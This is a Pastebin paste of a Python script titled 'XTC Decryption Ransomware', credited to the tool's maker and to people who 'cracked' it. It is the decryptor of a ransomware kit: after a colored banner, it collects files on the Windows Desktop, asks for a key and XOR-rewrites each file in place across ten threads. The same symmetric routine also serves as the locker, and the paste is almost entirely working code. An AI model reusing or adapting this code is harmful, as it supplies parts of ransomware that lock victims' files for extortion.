Advertisement
Guest User

XTC Decryption Ransomware

a guest
Oct 17th, 2022
431
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.56 KB | None | 0 0
  1. import os
  2. import colorama
  3. import threading
  4. import queue
  5.  
  6. from os import system
  7. from colorama import Fore
  8.  
  9. def water(text):
  10. system(""); faded = ""
  11. green = 10
  12. for line in text.splitlines():
  13. faded += (f"\033[38;2;0;{green};255m{line}\033[0m\n")
  14. if not green == 255:
  15. green += 15
  16. if green > 255:
  17. green = 255
  18. return faded
  19.  
  20. print(water("""
  21. ____ __ _ ______________
  22. / __ \___ ____________ ______ / /_ \ \/ /___ ___/ __/
  23. / / / / _ \/ ___/ ___/ / / / __ \/ __/ \ / / / / /
  24. / /_/ / __/ /__/ / / /_/ / /_/ / /_ / \ / / / /__
  25. /_____/\___/\___/_/ \__, / .___/\__/ /_/\ _\/_/ \___/
  26. /____/_/
  27.  
  28. Made By XTC Cracked By Net Monkes & Hacker Bug & PWN
  29. """))
  30.  
  31.  
  32.  
  33. def decrypt(key):
  34. while True:
  35. file = q.get()
  36. print(f'Decrypting {file}')
  37. try:
  38. key_index = 0
  39. max_key_index = len(key) - 1
  40. encrypted_data = ''
  41. with open(file, 'rb') as f:
  42. data = f.read()
  43. with open(file, 'w') as f:
  44. f.write('')
  45. for byte in data:
  46. xor_byte = byte ^ ord(key[key_index])
  47. with open(file, 'ab') as f:
  48. f.write(xor_byte.to_bytes(1, 'little'))
  49. if key_index >= max_key_index:
  50. key_index = 0
  51. else:
  52. key_index += 1
  53. print(f'{Fore.GREEN}{file} Successfully Decrypted')
  54. except:
  55. print(f'{Fore.RED}FAILED TO DECRYPT {file} ')
  56. q.task_done()
  57.  
  58. # encryption information
  59. encryption_level = 512 // 8
  60. key_char_pool = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ[]#@></\?.,'
  61. key_char_pool_len = len(key_char_pool)
  62.  
  63. #Grab file Paths
  64.  
  65. print(F"{Fore.YELLOW}Preparing Files..")
  66. desktop_path = os.environ['USERPROFILE']+'\\Desktop'
  67. files = os.listdir(desktop_path)
  68. abs_files = []
  69. for f in files:
  70. if os.path.isfile(f'{desktop_path}\\{f}') and f != __file__[:-2]+'txt':
  71. abs_files.append(f'{desktop_path}\\{f}')
  72. print(F"{Fore.GREEN}Successfully Located Files")
  73.  
  74. key = input(f'{Fore.YELLOW}Input Decryption Key: ')
  75.  
  76. q = queue.Queue()
  77. for f in abs_files:
  78. q.put(f)
  79.  
  80. for i in range(10):
  81. t = threading.Thread(target=decrypt, args=(key,), daemon=True)
  82. t.start()
  83.  
  84. q.join()
  85. print(f"{Fore.GREEN}Decryption Complete")
  86. input()
Tags: XTC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement